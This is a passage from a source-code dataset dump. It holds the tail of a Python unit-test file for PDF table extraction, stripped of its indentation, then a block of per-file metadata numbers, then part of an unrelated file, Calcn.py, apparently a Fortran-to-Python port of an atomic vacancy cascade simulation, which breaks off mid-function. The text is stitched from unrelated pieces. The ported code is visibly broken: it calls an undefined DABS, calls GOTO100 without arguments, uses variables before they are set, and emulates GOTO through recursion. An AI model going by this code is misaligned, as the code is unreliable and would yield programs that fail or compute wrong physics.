# Checks that it raises an error if one element is in two columns
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 3, 8))
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list)
def test_extract_table_from_different_pages(self):
# Checks that simple 2*2 tables are correctly extracted from different pages
#
# Page 1:
# elem_p1_1 elem_p1_2
# elem_p1_3 elem_p1_4
#
# Page 2:
# elem_p2_1 elem_p2_2
# elem_p2_3 elem_p2_4
#
elem_p1_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_p1_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_p1_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_p1_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
elem_p2_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_p2_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_p2_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_p2_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 5))
document = create_pdf_document(
elements={
1: [elem_p1_1, elem_p1_2, elem_p1_3, elem_p1_4],
2: [elem_p2_1, elem_p2_2, elem_p2_3, elem_p2_4],
}
)
elem_list = document.elements
result = extract_table(elem_list)
self.assertEqual(len(result), 4)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertEqual(len(result[2]), 2)
self.assertEqual(len(result[3]), 2)
self.assert_original_element_list_list_equal(
[
[elem_p1_1, elem_p1_2],
[elem_p1_3, elem_p1_4],
[elem_p2_1, elem_p2_2],
[elem_p2_3, elem_p2_4],
],
result,
)
def test_extract_table_with_tolerance(self):
# Checks that simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
# But with elem_4 slightly overlapping elem_2, counteracted by setting tolerance
elem_1 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 6, 10))
elem_2 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 6, 10))
elem_3 = FakePDFMinerTextElement(bounding_box=BoundingBox(0, 5, 0, 5))
elem_4 = FakePDFMinerTextElement(bounding_box=BoundingBox(6, 10, 0, 6.1))
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
extract_table(elem_list)
result = extract_table(elem_list, tolerance=0.2)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assert_original_element_list_list_equal(
[[elem_1, elem_2], [elem_3, elem_4]], result
)
def test_extract_text_from_simple_table(self):
# Checks that text from simple 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 6, 10), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
)
elem_4 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_4 "
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_simple_table(elem_list, as_text=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4"]], result
)
result = extract_simple_table(elem_list, as_text=True, strip_text=False)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4 "]], result
)
def test_extract_text_from_table(self):
# Checks that text from 2*2 table is correctly extracted
#
# elem_1 elem_2
# elem_3 elem_4
#
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 6, 10), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
)
elem_4 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_4 "
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3, elem_4])
elem_list = document.elements
result = extract_table(elem_list, as_text=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4"]], result
)
result = extract_table(elem_list, as_text=True, strip_text=False)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", "fake_text_4 "]], result
)
# Checks that text from the following table is correctly extracted
#
# elem_1 elem_2 elem_6
# elem_3 elem_4 elem_5
#
elem_5 = FakePDFMinerTextElement(
bounding_box=BoundingBox(11, 15, 0, 5), text="fake_text_5"
)
elem_6 = FakePDFMinerTextElement(
bounding_box=BoundingBox(16, 20, 6, 10), text="fake_text_6"
)
document = create_pdf_document(
elements=[elem_1, elem_2, elem_3, elem_4, elem_5, elem_6]
)
elem_list = document.elements
result = extract_table(elem_list, as_text=True)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 4)
self.assertEqual(len(result[1]), 4)
self.assertListEqual(
[
["fake_text_1", "fake_text_2", "", "fake_text_6"],
["fake_text_3", "fake_text_4", "fake_text_5", ""],
],
result,
)
result = extract_table(elem_list, as_text=True, strip_text=False)
self.assertListEqual(
[
["fake_text_1", "fake_text_2", "", "fake_text_6"],
["fake_text_3", "fake_text_4 ", "fake_text_5", ""],
],
result,
)
def test_add_header_to_table(self):
# Checks behaviour if header is not provided
table = []
result = add_header_to_table(table)
self.assertEqual(result, [])
fake_header = ["fake_header_1", "fake_header_2"]
table = [fake_header]
result = add_header_to_table(table)
self.assertEqual(result, [])
table = [fake_header, ["fake_value_1", "fake_value_2"]]
result = add_header_to_table(table)
self.assertEqual(len(result), 1)
self.assertListEqual(
result, [{"fake_header_1": "fake_value_1", "fake_header_2": "fake_value_2"}]
)
table = [
fake_header,
["fake_value_1.1", "fake_value_1.2"],
["fake_value_2.1", "fake_value_2.2"],
]
result = add_header_to_table(table)
self.assertEqual(len(result), 2)
self.assertListEqual(
result,
[
{"fake_header_1": "fake_value_1.1", "fake_header_2": "fake_value_1.2"},
{"fake_header_1": "fake_value_2.1", "fake_header_2": "fake_value_2.2"},
],
)
# Checks behaviour if header is provided
fake_header = ["fake_header_1", "fake_header_2"]
table = []
result = add_header_to_table(table, header=fake_header)
self.assertEqual(result, [])
table = [["fake_value_1", "fake_value_2"]]
result = add_header_to_table(table, header=fake_header)
self.assertEqual(len(result), 1)
self.assertListEqual(
result, [{"fake_header_1": "fake_value_1", "fake_header_2": "fake_value_2"}]
)
table = [
["fake_value_1.1", "fake_value_1.2"],
["fake_value_2.1", "fake_value_2.2"],
]
result = add_header_to_table(table, header=fake_header)
self.assertEqual(len(result), 2)
self.assertListEqual(
result,
[
{"fake_header_1": "fake_value_1.1", "fake_header_2": "fake_value_1.2"},
{"fake_header_1": "fake_value_2.1", "fake_header_2": "fake_value_2.2"},
],
)
redundant_fake_header = ["fake_header", "fake_header"]
with self.assertRaises(InvalidTableHeaderError):
result = add_header_to_table(table, header=redundant_fake_header)
too_small_fake_header = ["fake_header"]
with self.assertRaises(InvalidTableHeaderError):
result = add_header_to_table(table, header=too_small_fake_header)
def test_fix_element_in_multiple_rows(self):
# Checks that the following table is correctly extracted:
# ---------
# | 1 | 2 |
# ----| |
# | 3 | |
# ---------
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 10), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_3"
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list, as_text=True)
result = extract_table(
elem_list, as_text=True, fix_element_in_multiple_rows=True
)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", "fake_text_2"], ["fake_text_3", ""]], result
)
def test_fix_element_in_multiple_cols(self):
# Checks that the following table is correctly extracted:
# ---------
# | 1 |
# --------|
# | 2 | 3 |
# ---------
elem_1 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 10, 6, 10), text="fake_text_1"
)
elem_2 = FakePDFMinerTextElement(
bounding_box=BoundingBox(0, 5, 0, 5), text="fake_text_2"
)
elem_3 = FakePDFMinerTextElement(
bounding_box=BoundingBox(6, 10, 0, 5), text="fake_text_3"
)
document = create_pdf_document(elements=[elem_1, elem_2, elem_3])
elem_list = document.elements
with self.assertRaises(TableExtractionError):
result = extract_table(elem_list, as_text=True)
result = extract_table(
elem_list, as_text=True, fix_element_in_multiple_cols=True
)
self.assertEqual(len(result), 2)
self.assertEqual(len(result[0]), 2)
self.assertEqual(len(result[1]), 2)
self.assertListEqual(
[["fake_text_1", ""], ["fake_text_2", "fake_text_3"]], result
)
def test_get_text_from_table(self):
# Checks that it works with very simple table with one element
element = create_pdf_element(text=" fake_text ")
result = get_text_from_table([[element]])
self.assertEqual(result, [["fake_text"]])
result = get_text_from_table([[element]], strip_text=False)
self.assertEqual(result, [[" fake_text "]])
result = get_text_from_table([[None]])
self.assertEqual(result, [[""]])
# Checks that it works with table with multiple rows and columns
result = get_text_from_table([[element, None], [element, element]])
self.assertListEqual(result, [["fake_text", ""], ["fake_text", "fake_text"]])
def test_validate_table_shape(self):
# Checks that empty table has a valid shape
table = []
self.assertIsNone(_validate_table_shape(table))
# Checks that 2*2 table has a valid shape
table = [["", ""], ["", ""]]
self.assertIsNone(_validate_table_shape(table))
# Checks that 2*2 table containing None has a valid shape
table = [["", None], ["", ""]]
self.assertIsNone(_validate_table_shape(table))
# Checks that non rectangular table does not have a valid shape
table = [[""], ["", ""]]
with self.assertRaises(InvalidTableError):
_validate_table_shape(table)
| 40.672913
| 88
| 0.614241
| 2,945
| 23,875
| 4.649576
| 0.043803
| 0.153947
| 0.168845
| 0.223472
| 0.932228
| 0.913532
| 0.894983
| 0.889506
| 0.87468
| 0.857811
| 0
| 0.054223
| 0.282387
| 23,875
| 586
| 89
| 40.742321
| 0.744995
| 0.108314
| 0
| 0.675234
| 0
| 0
| 0.055396
| 0
| 0
| 0
| 0
| 0
| 0.214953
| 1
| 0.037383
| false
| 0
| 0.011682
| 0
| 0.051402
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
826aa7f06d84075f7c4d821198948ef34756ea0a
| 72,681
|
py
|
Python
|
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | 1
|
2018-08-26T05:10:56.000Z
|
2018-08-26T05:10:56.000Z
|
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | null | null | null |
Calcn.py
|
fireballpoint1/fortranTOpy
|
55843a62c6f0a2f8e2a777ef70193940d3d2d141
|
[
"Apache-2.0"
] | 1
|
2018-06-26T18:06:44.000Z
|
2018-06-26T18:06:44.000Z
|
import conf
import numpy
import random
from Shake import *
def CALC(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
# IMPLICIT #real*8(A-H,O-Z)
# IMPLICIT #integer*8(I-N)
# SCR=""\
# SCR1=""
global IFIRST,ESHK,ELECN,JVAC,R1
ESHK=0.0
JVAC=0.0
def get_globals():
NDVEC=conf.NDVEC
MSUM=conf.MSUM
MCOMP=conf.MCOMP
MRAYL=conf.MRAYL
MPAIR=conf.MPAIR
MPHOT=conf.MPHOT
MVAC=conf.MVAC
ELEV=conf.ELEV
NSDEG=conf.NSDEG
AA=conf.AA
BB=conf.BB
SCR=conf.SCR
SCR1=conf.SCR1
PRSH=conf.PRSH
ESH=conf.ESH
AUG=conf.AUG
RAD=conf.RAD
PRSHBT=conf.PRSHBT
IZ=conf.IZ
INIOCC=conf.INIOCC
ISHLMX=conf.ISHLMX
AMZ=conf.AMZ
NOCC=conf.NOCC
AUGR=conf.AUGR
RADR=conf.RADR
IONSUM=conf.IONSUM
IFLSUM=conf.IFLSUM
ESTORE=conf.ESTORE
EPHOTON=conf.EPHOTON
DRXE=conf.DRXE
DRYE=conf.DRYE
DRZE=conf.DRZE
DRX=conf.DRX
DRY=conf.DRY
DRZ=conf.DRZ
globals().update(locals())
get_globals()
def update_globals():
conf.NDVEC=NDVEC
conf.MSUM=MSUM
conf.MCOMP=MCOMP
conf.MRAYL=MRAYL
conf.MPAIR=MPAIR
conf.MPHOT=MPHOT
conf.MVAC=MVAC
conf.ELEV=ELEV
conf.NSDEG=NSDEG
conf.AA=AA
conf.BB=BB
conf.SCR,SCR1=SCR,SCR1
conf.PRSH=PRSH
conf.ESH=ESH
conf.AUG=AUG
conf.RAD=RAD
conf.PRSHBT=PRSHBT
conf.IZ=IZ
conf.INIOCC=INIOCC
conf.ISHLMX=ISHLMX
conf.AMZ=AMZ
conf.NOCC=NOCC
conf.AUGR=AUGR
conf.RADR=RADR
conf.IONSUM=IONSUM
conf.IFLSUM=IFLSUM
conf.ESTORE=ESTORE
conf.EPHOTON=EPHOTON
conf.DRXE=DRXE
conf.DRYE=DRYE
conf.DRZE=DRZE
conf.DRX=DRX
conf.DRY=DRY
conf.DRZ=DRZ
globals().update(locals())
#DIMENSION
TEMP=[0 for x in range(17+1)]
TEMP1=[0 for x in range(289+1)]
#
# CALCULATE CASCADE IN GAS KGAS AND MOLECULAR COMPONENT LGAS
# WITH INTIAL ENERGY DEPOSIT ELECEN AND SHELL VACANCY CREATED AT ISHELL
#
# INITIAL PHOTON DIRECTION DRX, DRY AND DRZ
DRXINIT=DRXE[int(NVAC)][1]
DRYINIT=DRYE[int(NVAC)][1]
DRZINIT=DRZE[int(NVAC)][1]
ISHELLST=ISHELL
def GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
global IFIRST,ESHK,ELECN,JVAC
if(ICON==2 and IONSUM[int(NVAC)] == 1):
return
# GO INTO SECOND BETA LOOP
print("calc 104 ICON,IONSUM[int(NVAC)],ISECOND= ",ICON,IONSUM[int(NVAC)],ISECOND)
if(ICON == 3 and IONSUM[int(NVAC)] == 1 and ISECOND == 1):
GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
print("calc 107 ICON,IFIRST,JVAC,ISECOND= ",ICON,IFIRST,JVAC,ISECOND)
if(ICON == 3 and IFIRST == 1 and JVAC == 0 and ISECOND == 2):
return 1
# C
update_globals()
UPDATE(KGAS,LGAS,ISHELL)
# C CHOOSE FLUORESCENCE OR AUGER TRANSITION
TSUM=0.0
for I in range(1,17+1):
TSUM=TSUM+RADR[KGAS][LGAS][ISHELL][I]
for J in range(1,17+1):
TSUM=TSUM+AUGR[KGAS][LGAS][ISHELL][I][J]
# 10 CONTINUE
# C NO MORE TRANSITIONS POSSIBLE
if(TSUM == 0.0 and ICON == 3 and ISECOND == 1):
globals().update(locals())
GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
if(TSUM == 0.0):
return 1
# C NORMALISE TO 1.0
for I in range(1,17+1):
RADR[KGAS][LGAS][ISHELL][I]=RADR[KGAS][LGAS][ISHELL][I]/TSUM
for J in range(1,17+1):
AUGR[KGAS][LGAS][ISHELL][I][J]=AUGR[KGAS][LGAS][ISHELL][I][J]/TSUM
# 11 CONTINUE
# C CREATE CUMULATIVE SUM ARRAY
TEMP[1]=RADR[KGAS][LGAS][ISHELL][1]
for I in range(2,17+1):
TEMP[I]=RADR[KGAS][LGAS][ISHELL][I]+TEMP[I-1]
# 12 CONTINUE
TEMP1[1]=AUGR[KGAS][LGAS][ISHELL][1][1]
for I in range(2,17+1):
TEMP1[I]=AUGR[KGAS][LGAS][ISHELL][I][1]+TEMP1[I-1]
# 13 CONTINUE
for J in range(1,16+1):
for I in range(1,17+1):
TEMP1[I+(J*17)]=AUGR[KGAS][LGAS][ISHELL][I][(J+1)]+TEMP1[I+(J*17)-1]
# 14 CONTINUE
# C FIND FLUORESCENCE OR AUGER TRANSITION
# 15
R1=random.uniform(0.0,1.0)
for I in range(1,17+1):
if(R1 < TEMP[I]):
# C STORE PHOTON ENERGY AND ANGLE THEN UPDATE NOCC
IFLSUM[int(NVAC)]=IFLSUM[int(NVAC)]+1
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]]-ELEV[I][IZ[KGAS][LGAS]]
if(ICON == 2):
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]+1]-ELEV[I][IZ[KGAS][LGAS]+1]
if(ICON == 3):
EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]]=ELEV[ISHELL][IZ[KGAS][LGAS]+2]-ELEV[I][IZ[KGAS][LGAS]+2]
if(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]] < 0.0):
# WRITE(6,545)
# 545
print(' PHOTON ENERGY=%.3f NVAC=%d IFLSUM=%d IN CALC'%(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]],IFLSUM[int(NVAC)],NVAC))
ELEFT=ELEFT-DABS(EPHOTON[int(NVAC)][IFLSUM[int(NVAC)]])
if(ELEFT < 0.0):
GOTO100()
# C RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
# C CALC DIRECTION COSINES OF FLUORESCENCE
DRX[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.cos(PHI)
DRY[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.sin(THET)*numpy.sin(PHI)
DRZ[int(NVAC)][IFLSUM[int(NVAC)]]=numpy.cos(THET)
# C
NOCC[KGAS][LGAS][ISHELL]=NOCC[KGAS][LGAS][ISHELL]+1
NOCC[KGAS][LGAS][I]=NOCC[KGAS][LGAS][I]-1
# C FIND LOWEST VACANCY
update_globals()
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# C NO MORE TRANSITIONS POSSIBLE
# C SECOND ELECTRON IN DOUBLE BETA DECAY
if(ICON == 3 and ISECOND == 1):
globals().update(locals())
GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return
# ENDif
globals().update(locals())
GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# ENDif
# 16 CONTINUE
globals().update(locals())
return 1
def GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
global IFIRST,ESHK,ELECN,JVAC
globals().update(locals())
# CHECK FOR ELECTRON SHAKEOFF
IFIRST=IFIRST+1
if(IFIRST > 1):
ELECN=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]
globals().update(locals())
ISHELL,ELECN,KGAS,LGAS,ESHK,ICON,IFIRST,JVAC=SHAKE(ISHELL,ELECN,KGAS,LGAS,ESHK,ICON,IFIRST,JVAC)
globals().update(locals())
# CALCULATE ENERGY OF ELECTRON
print("calc 203 JVAC=",JVAC)
if(JVAC == 0):
pass
else:
if(IFIRST == 1):
# INITIAL ELECTRON + SHAKEOFF
if(ICON == 1):
ELECN=ELECN-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ICON == 2):
ELECN=ELECN-ESHK-ELEV[JVAC,(IZ[KGAS][int(LGAS)]+1)]
if(ICON == 2 or ICON == 3):
ISHELL=JVAC
if(ICON == 3):
ELECN=ELECN-ESHK-ELEV[JVAC][(IZ[int(KGAS)][int(LGAS)]+2)]
# PRIMARY ELECTRON
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ELECN
# endif
if(ICON == 1 and IFIRST != 1):
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
# MAXIMUM ION CHARGE STATE =28
if(IONSUM[int(NVAC)]> 28):
#WRITE(6,99) IONSUM[int(NVAC)]
#99
print(' WARNING ION CHARGE LIMITED TO 28+ IN THIS VERSION')
sys.exit()
# endif
# SHAKE ELECTRON
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESHK
if(ICON == 1):
ELEFT=ELEFT-ESHK-ELEV[JVAC][IZ[int(KGAS)][int(LGAS)]]
if(ICON == 2):
ELEFT=ELEFT-ESHK-ELEV[JVAC,(IZ[KGAS,LGAS]+1)]
if(ICON == 3):
ELEFT=ELEFT-ESHK-ELEV[JVAC][(IZ[int(KGAS)][int(LGAS)]+2)]
if(ELEFT < 0.0):
globals().update(locals())
complete=GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return complete
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
# RETURN IF NO SHAKE OFF WITH BETA DECAY
complete=GOTO2(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
if(complete):
return 1
counter116=1
while(counter116):
counter116=0
R2=R1-TEMP[17]
for J in range(1,17+1):
if(counter116):
break
for I in range(1,17+1):
if(R2 < TEMP1[I+((J-1)*17)]):
# AUGER OR COSTER KRONIG
# STORE EJECTED ELECTRON AND UPDATE NOCC
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+1])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+1])*0.5
if(ICON == 2):
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]+1]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]+1]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+2])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]+1]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+2])*0.5
if(ICON == 3):
ETEMP=ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]+2]-(ELEV[I][IZ[int(KGAS)][int(LGAS)]+2]+ELEV[I][IZ[int(KGAS)][int(LGAS)]+3])*0.5-(ELEV[J][IZ[int(KGAS)][int(LGAS)]+2]+ELEV[J][IZ[int(KGAS)][int(LGAS)]+3])*0.5
if(ETEMP < 0.0):
# DO NOT ALLOW NEGATIVE ENERGY TRANSITIONS
counter117=1
while(counter117):
counter117=0
R1=random.uniform(0.0,1.0)
if(R1 < TEMP[17]):
counter117=1
counter116=1
break
# endif
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
if(IONSUM[int(NVAC)]> 28):
print(' IONSUM LIMITED TO 28 IN THIS VERSION IONSUM=',IONSUM[int(NVAC)],' IN CALC')
sys.exit()
# endif
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ETEMP
ELEFT=ELEFT-ETEMP
if(ELEFT < 0.0):
GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THET)
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]+1
NOCC[int(KGAS)][int(LGAS)][I]=NOCC[int(KGAS)][int(LGAS)][I]-1
NOCC[int(KGAS)][int(LGAS)][J]=NOCC[int(KGAS)][int(LGAS)][J]-1
# FIND LOWEST VACANCY
VACANCY(KGAS,LGAS,ISHELL,ILAST)
if(ILAST == 1):
# NO MORE TRANSITIONS POSSIBLE
# SECOND ELECTRON IN DOUBLE BETA DECAY
if(ICON == 3 and ISECOND == 1):
GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
update_globals()
return
# endif
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
# endif
globals().update(locals())
def GOTO66(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
global IFIRST,ESHK,ELECN,JVAC
IONSUM[int(NVAC)]=IONSUM[int(NVAC)]+1
ESTORE[int(NVAC)][int(IONSUM[int(NVAC)])]=ESECOND
DRXE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THESEC)*numpy.cos(PHISEC)
DRYE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.sin(THESEC)*numpy.sin(PHISEC)
DRZE[int(NVAC)][int(IONSUM[int(NVAC)])]=numpy.cos(THESEC)
ELECN=ESECOND
ISECOND=2
ISHELL=0
IFIRST=0
# LOOP AROUND CASCADE
globals().update(locals())
GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return 1
def GOTO100(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON):
print("calcn ISHELL=", ISHELL)
global IFIRST,ESHK,ELECN,JVAC
complete=0
ELEFT=ELECEN
ISHELL=ISHELLST
API=numpy.arccos(-1.00)
TWOPI=2.00*API
ISECOND=1
IFIRST=0
# SET STARTING ARRAY NOCC EQUAL TO INIOCC
for I in range(1,17+1):
NOCC[int(KGAS)][int(LGAS)][I]=INIOCC[int(KGAS)][int(LGAS)][I]
# PHOTONS
print("344 calc ICON=",ICON)
if(ICON == 1):
IONSUM[int(NVAC)]=1
IFLSUM[int(NVAC)]=0
# STORE INITIAL PHOTOELECTRON ENERGY AND ANGLE
ESTORE[int(NVAC)][1]=ELECEN-ELEV[ISHELL][IZ[int(KGAS)][int(LGAS)]]
ELECN=ESTORE[int(NVAC)][1]
ELEFT=ELEFT-ESTORE[int(NVAC)][1]
NOCC[int(KGAS)][int(LGAS)][ISHELL]=NOCC[int(KGAS)][int(LGAS)][ISHELL]-1
# ENTRY FOR COMPTON ELECTRON.....
if(NVAC <= MCOMP[IPN]):
# IF COMPTON EVENT ELECTRON ANGLE FROM COMPTON (ALREADY STORED)
globals().update(locals())
complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return complete
# endif
# USE PHOTOELCTRON ANGULAR DISTRIBUTION
APE=AA[ISHELL]
BPE=BB[ISHELL]
ANGGEN(APE,BPE,THET)
if(THET < 0.0):
THET=THET+API
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
# INITIAL PHOTON DIRECTION DRXINIT, DRYINIT AND DRZINIT
DRCOS(DRXINIT,DRYINIT,DRZINIT,THET,PHI,DRXX,DRYY,DRZZ)
DRXE[int(NVAC)][1]=DRXX
DRYE[int(NVAC)][1]=DRYY
DRZE[int(NVAC)][1]=DRZZ
globals().update(locals())
complete=GOTO4(IPN,NVAC,KGAS,LGAS,ELECEN,ISHELL,ICON)
return complete
# endif
if(ICON == 2):
# BETA DECAY
IONSUM[int(NVAC)]=1
IFLSUM[int(NVAC)]=0
ISHELL=0
ELECN=ELECEN
ESTORE[int(NVAC)][1]=ELECN
if(NDVEC == 2):
# RANDOM EMISSION DIRECTION
R3=random.uniform(0.0,1.0)
THET=numpy.arccos(1.0-2.0*R3)
elif(NDVEC == 0):
# RANDOM EMISSION IN THE X-Y PLANE
THET=API/2.0
elif(NDVEC == 1):
# EMISSION ALONG Z AXIS
THET=0.00
elif(NDVEC == -1):
# EMISSION ALONG -Z AXIS
THET=numpy.arccos(-1.00)
else:
print(' ERROR NDVEC NOT CORRECT SUBROUTINE STOPPED:')
sys.exit()
# endif
R3=random.uniform(0.0,1.0)
PHI=TWOPI*R3
DRXE[int(NVAC)][1]=numpy.sin(THET)*numpy.cos(PHI)
DRYE[int(NVAC)][1]=numpy.sin(THET)*numpy.sin(PHI)
DRZE[int(NVAC)][1]=numpy.cos(THET)
# endif
# DOUBLE BETA DECAY
if(ICON == 3):
IONSUM[int(NVAC)]=1
IFLSUM[int(NVAC)]=0
ISHELL=0
ELECN=ELECEN
ESTORE[int(NVAC)][1]=ELECN
ESECOND=ELECN
if(NDVEC == 2):
# RANDOM EMISSION DIRECTION
